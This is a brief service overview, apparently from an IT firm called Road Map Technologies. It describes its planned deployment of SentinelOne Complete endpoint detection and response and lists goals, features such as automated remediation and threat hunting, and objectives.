SentinelOne
Endpoint Detection and Response
Background
Endpoint Detection and Response (EDR) is a prospective cyber security service provided by Road Map Technologies that focuses on monitoring, detecting, and responding to threats on endpoint devices such as workstations, mobile devices, and servers. EDR is able to provide real time visibility and protection against malicious software.
Goal: To protect an organization’s endpoint devices from cyber threats through continuous monitoring, threat detection, and incident response.
Implement an EDR solution to:
- Collect endpoint data such as system processes, file activities, network connections and user actions.
- Detect threats by analyzing collected data for suspicious behavior.
- Utilize real-time visibility and monitoring into endpoint activates to allow security teams to track and investigate incidents as they happen.
- Utilize a combination or automated and manual incident response.
- Be proactive by utilizing threat hunting features to detect threats and indicators of compromise that are not yet implemented in the tool.
Service Summary
Road Map Technologies will run the Sentinel One Complete version of its EDR solution. Sentinel One Complete delivers an AI-driven threat prevention, detection, and automated response across workstations and servers.
Key Features:
- AI-powered threat prevention: Utilized machine learning and behavioral analysis to provide real-time protection against threats.
- Active EDR: Continuously monitors endpoint activities and will automatically correlate events to create attack storylines.
- Automated Response: Features an autonomous remediation capability which allows it to automatically mitigate threats, isolate an infected hosts, and restore compromised devices.
- Deep Visibility: Provides comprehensive visibility into an endpoint allowing for analysts to perform threat hunting (proactivity) and respond to incidents effectively (reactivity).
- Cloud Based: A Cloud-native solution.
- Light Weight Agent: The required agent has a minimal footprint and low resource consumption.
- Integrations: Supports API integrations to connect it with existing security infrastructure.
Objectives
- Real-time Visibility
- Threat Detection
- Incident Response
- Threat Hunting
- Integration with existing infrastructure
- Reduce Dell Time
- Improve Security Posture